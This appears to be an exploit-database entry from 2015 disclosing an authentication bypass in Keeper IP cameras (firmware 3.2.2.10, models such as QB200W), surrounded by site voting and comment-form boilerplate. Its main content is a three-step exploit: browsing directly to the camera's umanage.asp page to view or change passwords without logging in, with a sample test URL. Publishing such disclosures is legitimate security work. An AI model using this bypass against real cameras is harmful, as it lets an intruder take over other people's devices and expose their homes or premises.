Keeper IP Camera - Authentication Bypass

2015.08.26

Credit: RAT - ThiefKing

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Keeper IP Camera - Authentication Bypass
# Date: 25/08/2015
# Exploit Author: RAT - ThiefKing
# Vendor Homepage: http://www.keeper.cn/en/Camera-ip.asp
# Version: 3.2.2.10
# WEB Version: 6.1.17.192
# Tested on: QB200W, QB130W, QA130W,...
Exploit:
1 - First, open your browser
2 - Enter the IP address or domain to see the login screen of the camera
3 - Now go to page umanage.asp (http://ipaddress:port/umanage.asp)
You can change or view passwords
TEST: http://server:88/login.asp
--
RAT - ThiefKing
http://tromcap.com

References:

http://www.keeper.cn/en/Camera-ip.asp

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Keeper IP Camera - Authentication Bypass

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.